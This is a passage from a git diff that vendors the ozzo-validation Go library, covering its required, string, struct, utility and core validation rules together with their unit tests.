+var NilOrNotEmpty = &requiredRule{message: "cannot be blank", skipNil: true} + +type requiredRule struct { + message string + skipNil bool +} + +// Validate checks if the given value is valid or not. +func (v *requiredRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if v.skipNil && !isNil && IsEmpty(value) || !v.skipNil && (isNil || IsEmpty(value)) { + return errors.New(v.message) + } + return nil +} + +// Error sets the error message for the rule. +func (v *requiredRule) Error(message string) *requiredRule { + return &requiredRule{ + message: message, + skipNil: v.skipNil, + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/required_test.go b/vendor/github.com/go-ozzo/ozzo-validation/required_test.go new file mode 100644 index 0000000000..c85e412149 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/required_test.go @@ -0,0 +1,75 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestRequired(t *testing.T) { + s1 := "123" + s2 := "" + tests := []struct { + tag string + value interface{} + err string + }{ + {"t1", 123, ""}, + {"t2", "", "cannot be blank"}, + {"t3", &s1, ""}, + {"t4", &s2, "cannot be blank"}, + {"t5", nil, "cannot be blank"}, + } + + for _, test := range tests { + r := Required + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestNilOrNotEmpty(t *testing.T) { + s1 := "123" + s2 := "" + tests := []struct { + tag string + value interface{} + err string + }{ + {"t1", 123, ""}, + {"t2", "", "cannot be blank"}, + {"t3", &s1, ""}, + {"t4", &s2, "cannot be blank"}, + {"t5", nil, ""}, + } + + for _, test := range tests { + r := NilOrNotEmpty + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_requiredRule_Error(t *testing.T) { + r := Required + assert.Equal(t, "cannot be blank", r.message) + assert.False(t, r.skipNil) + r2 := r.Error("123") + assert.Equal(t, "cannot be blank", r.message) + assert.False(t, r.skipNil) + assert.Equal(t, "123", r2.message) + assert.False(t, r2.skipNil) + + r = NilOrNotEmpty + assert.Equal(t, "cannot be blank", r.message) + assert.True(t, r.skipNil) + r2 = r.Error("123") + assert.Equal(t, "cannot be blank", r.message) + assert.True(t, r.skipNil) + assert.Equal(t, "123", r2.message) + assert.True(t, r2.skipNil) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/string.go b/vendor/github.com/go-ozzo/ozzo-validation/string.go new file mode 100644 index 0000000000..e8f2a5e749 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/string.go @@ -0,0 +1,48 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import "errors" + +type stringValidator func(string) bool + +// StringRule is a rule that checks a string variable using a specified stringValidator. +type StringRule struct { + validate stringValidator + message string +} + +// NewStringRule creates a new validation rule using a function that takes a string value and returns a bool. +// The rule returned will use the function to check if a given string or byte slice is valid or not. +// An empty value is considered to be valid. Please use the Required rule to make sure a value is not empty. +func NewStringRule(validator stringValidator, message string) *StringRule { + return &StringRule{ + validate: validator, + message: message, + } +} + +// Error sets the error message for the rule. +func (v *StringRule) Error(message string) *StringRule { + return NewStringRule(v.validate, message) +} + +// Validate checks if the given value is valid or not. +func (v *StringRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + str, err := EnsureString(value) + if err != nil { + return err + } + + if v.validate(str) { + return nil + } + return errors.New(v.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/string_test.go b/vendor/github.com/go-ozzo/ozzo-validation/string_test.go new file mode 100644 index 0000000000..80da2286d9 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/string_test.go @@ -0,0 +1,106 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import ( + "database/sql" + "testing" + + "reflect" + + "github.com/stretchr/testify/assert" +) + +func validateMe(s string) bool { + return s == "me" +} + +func TestNewStringRule(t *testing.T) { + v := NewStringRule(validateMe, "abc") + assert.NotNil(t, v.validate) + assert.Equal(t, "abc", v.message) +} + +func TestStringValidator_Error(t *testing.T) { + v := NewStringRule(validateMe, "abc") + assert.Equal(t, "abc", v.message) + v2 := v.Error("correct") + assert.Equal(t, "correct", v2.message) + assert.Equal(t, "abc", v.message) +} + +func TestStringValidator_Validate(t *testing.T) { + v := NewStringRule(validateMe, "wrong") + + value := "me" + + err := v.Validate(value) + assert.Nil(t, err) + + err = v.Validate(&value) + assert.Nil(t, err) + + value = "" + + err = v.Validate(value) + assert.Nil(t, err) + + err = v.Validate(&value) + assert.Nil(t, err) + + nullValue := sql.NullString{String: "me", Valid: true} + err = v.Validate(nullValue) + assert.Nil(t, err) + + nullValue = sql.NullString{String: "", Valid: true} + err = v.Validate(nullValue) + assert.Nil(t, err) + + var s *string + err = v.Validate(s) + assert.Nil(t, err) + + err = v.Validate("not me") + if assert.NotNil(t, err) { + assert.Equal(t, "wrong", err.Error()) + } + + err = v.Validate(100) + if assert.NotNil(t, err) { + assert.NotEqual(t, "wrong", err.Error()) + } + + v2 := v.Error("Wrong!") + err = v2.Validate("not me") + if assert.NotNil(t, err) { + assert.Equal(t, "Wrong!", err.Error()) + } +} + +func TestGetErrorFieldName(t *testing.T) { + type A struct { + T0 string + T1 string `json:"t1"` + T2 string `json:"t2,omitempty"` + T3 string `json:",omitempty"` + T4 string `json:"t4,x1,omitempty"` + } + tests := []struct { + tag string + field string + name string + }{ + {"t1", "T0", "T0"}, + {"t2", "T1", "t1"}, + {"t3", "T2", "t2"}, + {"t4", "T3", "T3"}, + {"t5", "T4", "t4"}, + } + a := reflect.TypeOf(A{}) + for _, test := range tests { + field, _ := a.FieldByName(test.field) + 
assert.Equal(t, test.name, getErrorFieldName(&field), test.tag) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/struct.go b/vendor/github.com/go-ozzo/ozzo-validation/struct.go new file mode 100644 index 0000000000..2d3a19c34a --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/struct.go @@ -0,0 +1,154 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "fmt" + "reflect" + "strings" +) + +var ( + // StructPointerError is the error that a struct being validated is not specified as a pointer. + StructPointerError = errors.New("only a pointer to a struct can be validated") +) + +type ( + // FieldPointerError is the error that a field is not specified as a pointer. + FieldPointerError int + + // FieldNotFoundError is the error that a field cannot be found in the struct. + FieldNotFoundError int + + // FieldRules represents a rule set associated with a struct field. + FieldRules struct { + fieldPtr interface{} + rules []Rule + } +) + +// Error returns the error string of FieldPointerError. +func (e FieldPointerError) Error() string { + return fmt.Sprintf("field #%v must be specified as a pointer", int(e)) +} + +// Error returns the error string of FieldNotFoundError. +func (e FieldNotFoundError) Error() string { + return fmt.Sprintf("field #%v cannot be found in the struct", int(e)) +} + +// ValidateStruct validates a struct by checking the specified struct fields against the corresponding validation rules. +// Note that the struct being validated must be specified as a pointer to it. If the pointer is nil, it is considered valid. +// Use Field() to specify struct fields that need to be validated. Each Field() call specifies a single field which +// should be specified as a pointer to the field. A field can be associated with multiple rules. 
+// For example, +// +// value := struct { +// Name string +// Value string +// }{"name", "demo"} +// err := validation.ValidateStruct(&value, +// validation.Field(&a.Name, validation.Required), +// validation.Field(&a.Value, validation.Required, validation.Length(5, 10)), +// ) +// fmt.Println(err) +// // Value: the length must be between 5 and 10. +// +// An error will be returned if validation fails. +func ValidateStruct(structPtr interface{}, fields ...*FieldRules) error { + value := reflect.ValueOf(structPtr) + if value.Kind() != reflect.Ptr || !value.IsNil() && value.Elem().Kind() != reflect.Struct { + // must be a pointer to a struct + return NewInternalError(StructPointerError) + } + if value.IsNil() { + // treat a nil struct pointer as valid + return nil + } + value = value.Elem() + + errs := Errors{} + + for i, fr := range fields { + fv := reflect.ValueOf(fr.fieldPtr) + if fv.Kind() != reflect.Ptr { + return NewInternalError(FieldPointerError(i)) + } + ft := findStructField(value, fv) + if ft == nil { + return NewInternalError(FieldNotFoundError(i)) + } + if err := Validate(fv.Elem().Interface(), fr.rules...); err != nil { + if ie, ok := err.(InternalError); ok && ie.InternalError() != nil{ + return err + } + if ft.Anonymous { + // merge errors from anonymous struct field + if es, ok := err.(Errors); ok { + for name, value := range es { + errs[name] = value + } + continue + } + } + errs[getErrorFieldName(ft)] = err + } + } + + if len(errs) > 0 { + return errs + } + return nil +} + +// Field specifies a struct field and the corresponding validation rules. +// The struct field must be specified as a pointer to it. +func Field(fieldPtr interface{}, rules ...Rule) *FieldRules { + return &FieldRules{ + fieldPtr: fieldPtr, + rules: rules, + } +} + +// findStructField looks for a field in the given struct. +// The field being looked for should be a pointer to the actual struct field. +// If found, the field info will be returned. Otherwise, nil will be returned. 
+func findStructField(structValue reflect.Value, fieldValue reflect.Value) *reflect.StructField { + ptr := fieldValue.Pointer() + for i := structValue.NumField() - 1; i >= 0; i-- { + sf := structValue.Type().Field(i) + if ptr == structValue.Field(i).UnsafeAddr() { + // do additional type comparison because it's possible that the address of + // an embedded struct is the same as the first field of the embedded struct + if sf.Type == fieldValue.Elem().Type() { + return &sf + } + } + if sf.Anonymous { + // delve into anonymous struct to look for the field + fi := structValue.Field(i) + if sf.Type.Kind() == reflect.Ptr { + fi = fi.Elem() + } + if fi.Kind() == reflect.Struct { + if f := findStructField(fi, fieldValue); f != nil { + return f + } + } + } + } + return nil +} + +// getErrorFieldName returns the name that should be used to represent the validation error of a struct field. +func getErrorFieldName(f *reflect.StructField) string { + if tag := f.Tag.Get(ErrorTag); tag != "" { + if cps := strings.SplitN(tag, ",", 2); cps[0] != "" { + return cps[0] + } + } + return f.Name +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/struct_test.go b/vendor/github.com/go-ozzo/ozzo-validation/struct_test.go new file mode 100644 index 0000000000..97c7a4f1ac --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/struct_test.go @@ -0,0 +1,137 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import ( + "reflect" + "testing" + + "github.com/stretchr/testify/assert" +) + +type Struct1 struct { + Field1 int + Field2 *int + Field3 []int + Field4 [4]int + field5 int + Struct2 + S1 *Struct2 + S2 Struct2 +} + +type Struct2 struct { + Field21 string + Field22 string +} + +type Struct3 struct { + *Struct2 + S1 string +} + +func TestFindStructField(t *testing.T) { + var s1 Struct1 + v1 := reflect.ValueOf(&s1).Elem() + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field1))) + assert.Nil(t, findStructField(v1, reflect.ValueOf(s1.Field2))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field2))) + assert.Nil(t, findStructField(v1, reflect.ValueOf(s1.Field3))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field3))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field4))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.field5))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Struct2))) + assert.Nil(t, findStructField(v1, reflect.ValueOf(s1.S1))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.S1))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field21))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field22))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Struct2.Field22))) + s2 := reflect.ValueOf(&s1.Struct2).Elem() + assert.NotNil(t, findStructField(s2, reflect.ValueOf(&s1.Field21))) + assert.NotNil(t, findStructField(s2, reflect.ValueOf(&s1.Struct2.Field21))) + assert.NotNil(t, findStructField(s2, reflect.ValueOf(&s1.Struct2.Field22))) + s3 := Struct3{ + Struct2: &Struct2{}, + } + v3 := reflect.ValueOf(&s3).Elem() + assert.NotNil(t, findStructField(v3, reflect.ValueOf(&s3.Struct2))) + assert.NotNil(t, findStructField(v3, reflect.ValueOf(&s3.Field21))) +} + +func TestValidateStruct(t *testing.T) { + var m0 *Model1 + m1 := Model1{A: "abc", B: "xyz", c: "abc", G: "xyz"} + m2 := Model1{E: String123("xyz")} + m3 := Model2{} + 
m4 := Model2{M3: Model3{A: "abc"}, Model3: Model3{A: "abc"}} + m5 := Model2{Model3: Model3{A: "internal"}} + tests := []struct { + tag string + model interface{} + rules []*FieldRules + err string + }{ + // empty rules + {"t1.1", &m1, []*FieldRules{}, ""}, + {"t1.2", &m1, []*FieldRules{Field(&m1.A), Field(&m1.B)}, ""}, + // normal rules + {"t2.1", &m1, []*FieldRules{Field(&m1.A, &validateAbc{}), Field(&m1.B, &validateXyz{})}, ""}, + {"t2.2", &m1, []*FieldRules{Field(&m1.A, &validateXyz{}), Field(&m1.B, &validateAbc{})}, "A: error xyz; B: error abc."}, + {"t2.3", &m1, []*FieldRules{Field(&m1.A, &validateXyz{}), Field(&m1.c, &validateXyz{})}, "A: error xyz; c: error xyz."}, + {"t2.4", &m1, []*FieldRules{Field(&m1.D, Length(0, 5))}, ""}, + {"t2.5", &m1, []*FieldRules{Field(&m1.F, Length(0, 5))}, ""}, + // non-struct pointer + {"t3.1", m1, []*FieldRules{}, StructPointerError.Error()}, + {"t3.2", nil, []*FieldRules{}, StructPointerError.Error()}, + {"t3.3", m0, []*FieldRules{}, ""}, + {"t3.4", &m0, []*FieldRules{}, StructPointerError.Error()}, + // invalid field spec + {"t4.1", &m1, []*FieldRules{Field(m1)}, FieldPointerError(0).Error()}, + {"t4.2", &m1, []*FieldRules{Field(&m1)}, FieldNotFoundError(0).Error()}, + // struct tag + {"t5.1", &m1, []*FieldRules{Field(&m1.G, &validateAbc{})}, "g: error abc."}, + // validatable field + {"t6.1", &m2, []*FieldRules{Field(&m2.E)}, "E: error 123."}, + {"t6.2", &m2, []*FieldRules{Field(&m2.E, Skip)}, ""}, + // Required, NotNil + {"t7.1", &m2, []*FieldRules{Field(&m2.F, Required)}, "F: cannot be blank."}, + {"t7.2", &m2, []*FieldRules{Field(&m2.F, NotNil)}, "F: is required."}, + {"t7.3", &m2, []*FieldRules{Field(&m2.E, Required, Skip)}, ""}, + {"t7.4", &m2, []*FieldRules{Field(&m2.E, NotNil, Skip)}, ""}, + // embedded structs + {"t8.1", &m3, []*FieldRules{Field(&m3.M3, Skip)}, ""}, + {"t8.2", &m3, []*FieldRules{Field(&m3.M3)}, "M3: (A: error abc.)."}, + {"t8.3", &m3, []*FieldRules{Field(&m3.Model3, Skip)}, ""}, + {"t8.4", &m3, 
[]*FieldRules{Field(&m3.Model3)}, "A: error abc."}, + {"t8.5", &m4, []*FieldRules{Field(&m4.M3)}, ""}, + {"t8.6", &m4, []*FieldRules{Field(&m4.Model3)}, ""}, + {"t8.7", &m3, []*FieldRules{Field(&m3.A, Required), Field(&m3.B, Required)}, "A: cannot be blank; B: cannot be blank."}, + {"t8.8", &m3, []*FieldRules{Field(&m4.A, Required)}, "field #0 cannot be found in the struct"}, + // internal error + {"t9.1", &m5, []*FieldRules{Field(&m5.A, &validateAbc{}), Field(&m5.B, Required), Field(&m5.A, &validateInternalError{})}, "error internal"}, + } + for _, test := range tests { + err := ValidateStruct(test.model, test.rules...) + assertError(t, test.err, err, test.tag) + } + + // embedded struct + err := Validate(&m3) + if assert.NotNil(t, err) { + assert.Equal(t, "A: error abc.", err.Error()) + } + + a := struct { + Name string + Value string + }{"name", "demo"} + err = ValidateStruct(&a, + Field(&a.Name, Required), + Field(&a.Value, Required, Length(5, 10)), + ) + if assert.NotNil(t, err) { + assert.Equal(t, "Value: the length must be between 5 and 10.", err.Error()) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/util.go b/vendor/github.com/go-ozzo/ozzo-validation/util.go new file mode 100644 index 0000000000..2c1c5881c3 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/util.go @@ -0,0 +1,157 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "database/sql/driver" + "errors" + "fmt" + "reflect" +) + +var ( + bytesType = reflect.TypeOf([]byte(nil)) + valuerType = reflect.TypeOf((*driver.Valuer)(nil)).Elem() +) + +// EnsureString ensures the given value is a string. +// If the value is a byte slice, it will be typecast into a string. +// An error is returned otherwise. 
+func EnsureString(value interface{}) (string, error) { + v := reflect.ValueOf(value) + if v.Kind() == reflect.String { + return v.String(), nil + } + if v.Type() == bytesType { + return string(v.Interface().([]byte)), nil + } + return "", errors.New("must be either a string or byte slice") +} + +// StringOrBytes typecasts a value into a string or byte slice. +// Boolean flags are returned to indicate if the typecasting succeeds or not. +func StringOrBytes(value interface{}) (isString bool, str string, isBytes bool, bs []byte) { + v := reflect.ValueOf(value) + if v.Kind() == reflect.String { + str = v.String() + isString = true + } else if v.Kind() == reflect.Slice && v.Type() == bytesType { + bs = v.Interface().([]byte) + isBytes = true + } + return +} + +// LengthOfValue returns the length of a value that is a string, slice, map, or array. +// An error is returned for all other types. +func LengthOfValue(value interface{}) (int, error) { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.String, reflect.Slice, reflect.Map, reflect.Array: + return v.Len(), nil + } + return 0, fmt.Errorf("cannot get the length of %v", v.Kind()) +} + +// ToInt converts the given value to an int64. +// An error is returned for all incompatible types. +func ToInt(value interface{}) (int64, error) { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return v.Int(), nil + } + return 0, fmt.Errorf("cannot convert %v to int64", v.Kind()) +} + +// ToUint converts the given value to an uint64. +// An error is returned for all incompatible types. +func ToUint(value interface{}) (uint64, error) { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return v.Uint(), nil + } + return 0, fmt.Errorf("cannot convert %v to uint64", v.Kind()) +} + +// ToFloat converts the given value to a float64. 
+// An error is returned for all incompatible types. +func ToFloat(value interface{}) (float64, error) { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.Float32, reflect.Float64: + return v.Float(), nil + } + return 0, fmt.Errorf("cannot convert %v to float64", v.Kind()) +} + +// IsEmpty checks if a value is empty or not. +// A value is considered empty if +// - integer, float: zero +// - bool: false +// - string, array: len() == 0 +// - slice, map: nil or len() == 0 +// - interface, pointer: nil or the referenced value is empty +func IsEmpty(value interface{}) bool { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.String, reflect.Array, reflect.Map, reflect.Slice: + return v.Len() == 0 + case reflect.Bool: + return !v.Bool() + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return v.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return v.Uint() == 0 + case reflect.Float32, reflect.Float64: + return v.Float() == 0 + case reflect.Invalid: + return true + case reflect.Interface, reflect.Ptr: + if v.IsNil() { + return true + } + return IsEmpty(v.Elem().Interface()) + } + + return false +} + +// Indirect returns the value that the given interface or pointer references to. +// If the value implements driver.Valuer, it will deal with the value returned by +// the Value() method instead. A boolean value is also returned to indicate if +// the value is nil or not (only applicable to interface, pointer, map, and slice). +// If the value is neither an interface nor a pointer, it will be returned back. 
+func Indirect(value interface{}) (interface{}, bool) { + rv := reflect.ValueOf(value) + kind := rv.Kind() + switch kind { + case reflect.Invalid: + return nil, true + case reflect.Ptr, reflect.Interface: + if rv.IsNil() { + return nil, true + } + return Indirect(rv.Elem().Interface()) + case reflect.Slice, reflect.Map, reflect.Func, reflect.Chan: + if rv.IsNil() { + return nil, true + } + } + + if rv.Type().Implements(valuerType) { + return indirectValuer(value.(driver.Valuer)) + } + + return value, false +} + +func indirectValuer(valuer driver.Valuer) (interface{}, bool) { + if value, err := valuer.Value(); value != nil && err == nil { + return Indirect(value) + } + return nil, true +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/util_test.go b/vendor/github.com/go-ozzo/ozzo-validation/util_test.go new file mode 100644 index 0000000000..28a6d5161a --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/util_test.go @@ -0,0 +1,293 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. 
+ +package validation + +import ( + "testing" + + "database/sql" + + "github.com/stretchr/testify/assert" +) + +func TestEnsureString(t *testing.T) { + str := "abc" + bytes := []byte("abc") + + tests := []struct { + tag string + value interface{} + expected string + hasError bool + }{ + {"t1", "abc", "abc", false}, + {"t2", &str, "", true}, + {"t3", bytes, "abc", false}, + {"t4", &bytes, "", true}, + {"t5", 100, "", true}, + } + for _, test := range tests { + s, err := EnsureString(test.value) + if test.hasError { + assert.NotNil(t, err, test.tag) + } else { + assert.Nil(t, err, test.tag) + assert.Equal(t, test.expected, s, test.tag) + } + } +} + +type MyString string + +func TestStringOrBytes(t *testing.T) { + str := "abc" + bytes := []byte("abc") + var str2 string + var bytes2 []byte + var str3 MyString = "abc" + var str4 *string + + tests := []struct { + tag string + value interface{} + str string + bs []byte + isString bool + isBytes bool + }{ + {"t1", str, "abc", nil, true, false}, + {"t2", &str, "", nil, false, false}, + {"t3", bytes, "", []byte("abc"), false, true}, + {"t4", &bytes, "", nil, false, false}, + {"t5", 100, "", nil, false, false}, + {"t6", str2, "", nil, true, false}, + {"t7", &str2, "", nil, false, false}, + {"t8", bytes2, "", nil, false, true}, + {"t9", &bytes2, "", nil, false, false}, + {"t10", str3, "abc", nil, true, false}, + {"t11", &str3, "", nil, false, false}, + {"t12", str4, "", nil, false, false}, + } + for _, test := range tests { + isString, str, isBytes, bs := StringOrBytes(test.value) + assert.Equal(t, test.str, str, test.tag) + assert.Equal(t, test.bs, bs, test.tag) + assert.Equal(t, test.isString, isString, test.tag) + assert.Equal(t, test.isBytes, isBytes, test.tag) + } +} + +func TestLengthOfValue(t *testing.T) { + var a [3]int + + tests := []struct { + tag string + value interface{} + length int + err string + }{ + {"t1", "abc", 3, ""}, + {"t2", []int{1, 2}, 2, ""}, + {"t3", map[string]int{"A": 1, "B": 2}, 2, ""}, + {"t4", a, 
3, ""}, + {"t5", &a, 0, "cannot get the length of ptr"}, + {"t6", 123, 0, "cannot get the length of int"}, + } + + for _, test := range tests { + l, err := LengthOfValue(test.value) + assert.Equal(t, test.length, l, test.tag) + assertError(t, test.err, err, test.tag) + } +} + +func TestToInt(t *testing.T) { + var a int + + tests := []struct { + tag string + value interface{} + result int64 + err string + }{ + {"t1", 1, 1, ""}, + {"t2", int8(1), 1, ""}, + {"t3", int16(1), 1, ""}, + {"t4", int32(1), 1, ""}, + {"t5", int64(1), 1, ""}, + {"t6", &a, 0, "cannot convert ptr to int64"}, + {"t7", uint(1), 0, "cannot convert uint to int64"}, + {"t8", float64(1), 0, "cannot convert float64 to int64"}, + {"t9", "abc", 0, "cannot convert string to int64"}, + {"t10", []int{1, 2}, 0, "cannot convert slice to int64"}, + {"t11", map[string]int{"A": 1}, 0, "cannot convert map to int64"}, + } + + for _, test := range tests { + l, err := ToInt(test.value) + assert.Equal(t, test.result, l, test.tag) + assertError(t, test.err, err, test.tag) + } +} + +func TestToUint(t *testing.T) { + var a int + var b uint + + tests := []struct { + tag string + value interface{} + result uint64 + err string + }{ + {"t1", uint(1), 1, ""}, + {"t2", uint8(1), 1, ""}, + {"t3", uint16(1), 1, ""}, + {"t4", uint32(1), 1, ""}, + {"t5", uint64(1), 1, ""}, + {"t6", 1, 0, "cannot convert int to uint64"}, + {"t7", &a, 0, "cannot convert ptr to uint64"}, + {"t8", &b, 0, "cannot convert ptr to uint64"}, + {"t9", float64(1), 0, "cannot convert float64 to uint64"}, + {"t10", "abc", 0, "cannot convert string to uint64"}, + {"t11", []int{1, 2}, 0, "cannot convert slice to uint64"}, + {"t12", map[string]int{"A": 1}, 0, "cannot convert map to uint64"}, + } + + for _, test := range tests { + l, err := ToUint(test.value) + assert.Equal(t, test.result, l, test.tag) + assertError(t, test.err, err, test.tag) + } +} + +func TestToFloat(t *testing.T) { + var a int + var b uint + + tests := []struct { + tag string + value 
interface{} + result float64 + err string + }{ + {"t1", float32(1), 1, ""}, + {"t2", float64(1), 1, ""}, + {"t3", 1, 0, "cannot convert int to float64"}, + {"t4", uint(1), 0, "cannot convert uint to float64"}, + {"t5", &a, 0, "cannot convert ptr to float64"}, + {"t6", &b, 0, "cannot convert ptr to float64"}, + {"t7", "abc", 0, "cannot convert string to float64"}, + {"t8", []int{1, 2}, 0, "cannot convert slice to float64"}, + {"t9", map[string]int{"A": 1}, 0, "cannot convert map to float64"}, + } + + for _, test := range tests { + l, err := ToFloat(test.value) + assert.Equal(t, test.result, l, test.tag) + assertError(t, test.err, err, test.tag) + } +} + +func TestIsEmpty(t *testing.T) { + var s1 string + var s2 string = "a" + var s3 *string + s4 := struct{}{} + tests := []struct { + tag string + value interface{} + empty bool + }{ + // nil + {"t0", nil, true}, + // string + {"t1.1", "", true}, + {"t1.2", "1", false}, + {"t1.3", MyString(""), true}, + {"t1.4", MyString("1"), false}, + // slice + {"t2.1", []byte(""), true}, + {"t2.2", []byte("1"), false}, + // map + {"t3.1", map[string]int{}, true}, + {"t3.2", map[string]int{"a": 1}, false}, + // bool + {"t4.1", false, true}, + {"t4.2", true, false}, + // int + {"t5.1", int(0), true}, + {"t5.2", int8(0), true}, + {"t5.3", int16(0), true}, + {"t5.4", int32(0), true}, + {"t5.5", int64(0), true}, + {"t5.6", int(1), false}, + {"t5.7", int8(1), false}, + {"t5.8", int16(1), false}, + {"t5.9", int32(1), false}, + {"t5.10", int64(1), false}, + // uint + {"t6.1", uint(0), true}, + {"t6.2", uint8(0), true}, + {"t6.3", uint16(0), true}, + {"t6.4", uint32(0), true}, + {"t6.5", uint64(0), true}, + {"t6.6", uint(1), false}, + {"t6.7", uint8(1), false}, + {"t6.8", uint16(1), false}, + {"t6.9", uint32(1), false}, + {"t6.10", uint64(1), false}, + // float + {"t7.1", float32(0), true}, + {"t7.2", float64(0), true}, + {"t7.3", float32(1), false}, + {"t7.4", float64(1), false}, + // interface, ptr + {"t8.1", &s1, true}, + {"t8.2", &s2, 
false}, + {"t8.3", s3, true}, + // struct + {"t9.1", s4, false}, + {"t9.2", &s4, false}, + } + + for _, test := range tests { + empty := IsEmpty(test.value) + assert.Equal(t, test.empty, empty, test.tag) + } +} + +func TestIndirect(t *testing.T) { + var a int = 100 + var b *int + var c *sql.NullInt64 + + tests := []struct { + tag string + value interface{} + result interface{} + isNil bool + }{ + {"t1", 100, 100, false}, + {"t2", &a, 100, false}, + {"t3", b, nil, true}, + {"t4", nil, nil, true}, + {"t5", sql.NullInt64{Int64: 0, Valid: false}, nil, true}, + {"t6", sql.NullInt64{Int64: 1, Valid: false}, nil, true}, + {"t7", &sql.NullInt64{Int64: 0, Valid: false}, nil, true}, + {"t8", &sql.NullInt64{Int64: 1, Valid: false}, nil, true}, + {"t9", sql.NullInt64{Int64: 0, Valid: true}, int64(0), false}, + {"t10", sql.NullInt64{Int64: 1, Valid: true}, int64(1), false}, + {"t11", &sql.NullInt64{Int64: 0, Valid: true}, int64(0), false}, + {"t12", &sql.NullInt64{Int64: 1, Valid: true}, int64(1), false}, + {"t13", c, nil, true}, + } + + for _, test := range tests { + result, isNil := Indirect(test.value) + assert.Equal(t, test.result, result, test.tag) + assert.Equal(t, test.isNil, isNil, test.tag) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/validation.go b/vendor/github.com/go-ozzo/ozzo-validation/validation.go new file mode 100644 index 0000000000..1633258178 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/validation.go @@ -0,0 +1,133 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +// Package validation provides configurable and extensible rules for validating data of various types. +package validation + +import ( + "fmt" + "reflect" + "strconv" +) + +type ( + // Validatable is the interface indicating the type implementing it supports data validation. 
+	Validatable interface {
+		// Validate validates the data and returns an error if validation fails.
+		Validate() error
+	}
+
+	// Rule represents a validation rule.
+	Rule interface {
+		// Validate validates a value and returns an error if validation fails.
+		Validate(value interface{}) error
+	}
+
+	// RuleFunc represents a validator function.
+	// You may wrap it as a Rule by calling By().
+	RuleFunc func(value interface{}) error
+)
+
+var (
+	// ErrorTag is the struct tag name used to customize the error field name for a struct field.
+	ErrorTag = "json"
+
+	// Skip is a special validation rule that indicates all rules following it should be skipped.
+	Skip = &skipRule{}
+
+	validatableType = reflect.TypeOf((*Validatable)(nil)).Elem()
+)
+
+// Validate validates the given value and returns the validation error, if any.
+//
+// Validate performs validation using the following steps:
+// - validate the value against the rules passed in as parameters
+// - if the value is a map and the map values implement `Validatable`, call `Validate` of every map value
+// - if the value is a slice or array whose values implement `Validatable`, call `Validate` of every element
+func Validate(value interface{}, rules ...Rule) error {
+	for _, rule := range rules {
+		if _, ok := rule.(*skipRule); ok {
+			return nil
+		}
+		if err := rule.Validate(value); err != nil {
+			return err
+		}
+	}
+
+	rv := reflect.ValueOf(value)
+	if (rv.Kind() == reflect.Ptr || rv.Kind() == reflect.Interface) && rv.IsNil() {
+		return nil
+	}
+
+	if v, ok := value.(Validatable); ok {
+		return v.Validate()
+	}
+
+	switch rv.Kind() {
+	case reflect.Map:
+		if rv.Type().Elem().Implements(validatableType) {
+			return validateMap(rv)
+		}
+	case reflect.Slice, reflect.Array:
